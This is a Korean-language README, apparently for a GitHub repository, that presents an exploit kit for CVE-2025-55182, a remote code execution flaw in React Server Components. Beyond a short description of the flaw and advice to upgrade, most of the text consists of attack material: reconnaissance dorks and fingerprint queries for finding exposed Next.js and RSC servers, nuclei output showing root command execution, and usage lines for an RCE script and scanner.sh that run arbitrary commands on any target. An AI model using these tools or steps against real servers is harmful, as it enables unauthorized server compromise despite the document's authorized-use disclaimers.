
다수의 패키지 내 React Server Components (RSC) 구현에 영향을 미치는 중요한 원격 코드 실행(RCE) 취약점 포함.
CVE-2025-55182는 React Server Components (RSC) 구현체에 영향을 미치는 심각한 원격 코드 실행(RCE) 취약점으로, 다음 패키지를 포함합니다:
이 취약점은 RSC가 사용하는 내부 Flight 프로토콜을 통해 전송된 페이로드의 안전하지 않은 역직렬화로 인해 발생합니다. 신뢰할 수 없는 입력이 HTTP 요청을 통해 React Server Components로 전달되면 서버 측 코드 실행이 트리거될 수 있습니다.
영향을 받는 버전:
패치된 버전:
React Server Components는 클라이언트 측 요청을 수신하여 백엔드에서 파싱 및 역직렬화합니다. 취약점은 인바운드 데이터의 역직렬화에 대한 제어가 불충분하여 특수하게 조작된 페이로드가 실행 가능한 서버 측 구성 요소로 해석될 수 있는 데서 비롯됩니다.
이 경우 서버에서 임의의 JavaScript 실행이 발생할 수 있으며, 호스팅 환경과 권한에 따라 서버 전체가 손상될 수 있습니다.
공격에 성공하면 공격자는 다음을 수행할 수 있습니다:
CVSS 점수: 10.0 – CRITICAL
애플리케이션이 React Server Components를 노출하는지, 영향을 받는 버전이 사용 중인지 확인합니다.
curl -I https://target.com/?__rsc=1
이 키워드는 공개 저장소나 웹 애플리케이션이 RSC 구성 요소를 참조하는지 식별하는 데 도움이 됩니다.
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"
조직 도메인의 내부 감사 목적으로만 사용하십시오.
노출된 프레임워크 사용 여부를 확인하며, 취약점 악용이 아닙니다.
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"
방어적 스캐닝을 자동화하려면 템플릿 기반 탐지 로직을 복제하여 자체 인프라 평가에 사용하십시오:
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml
[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.
CVE-2025-55182.py)임의의 명령을 실행하고 출력을 검색하는 완전한 기능의 RCE 익스플로잇 스크립트입니다.
사용법:
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"
chmod +x scanner.sh
# 기본 명령(id)으로 스캔
./scanner.sh -d example.com
# 사용자 정의 명령 실행
./scanner.sh -d example.com -c "whoami"
# 전체 URL 사용
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - 대상 도메인/URL (필수)-c, --command - 실행할 명령 (기본값: id)# 대상이 취약한지 확인
./scanner.sh -d vulnerable-app.com
# 시스템 정보 확인
./scanner.sh -d vulnerable-app.com -c "uname -a"
# 파일 목록 보기
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Bash
curl
openssl
저장소 내 템플릿은 다음 용도로 사용됩니다:
중요: 이 템플릿은 귀하가 소유하거나 평가 권한이 있는 시스템에서만 실행해야 합니다.
이 저장소에 포함된 Nuclei 템플릿은 다음 용도로만 사용됩니다:
다음을 확인하십시오:
패치된 릴리스 중 하나로 업그레이드하십시오:
보안 연구원 • 사이버 보안 트레이너 • 버그 바운티 헌터
좌우명: Zero Trust Full Secure 🚀
CVE-2025-55182는 현재 React 기반 인프라에 대한 가장 심각한 위협 중 하나입니다. 간단한 익스플로잇 벡터와 인증되지 않은 공격 표면으로 인해 즉시 패치를 강력히 권장합니다. 영향을 받는 RSC 버전을 실행하는 모든 조직은 긴급 우선 순위를 고려해야 합니다.
이 저장소와 문서는 귀하가 소유한 자산의 방어적 연구 및 보안 검증을 위한 것입니다. 오용 시 불법일 수 있습니다. 귀하는 법률 및 조직 정책을 준수할 책임이 있습니다.
Made with ❤️ by Cyber Leelawat
Zero Trust Full Secure 🎯🔐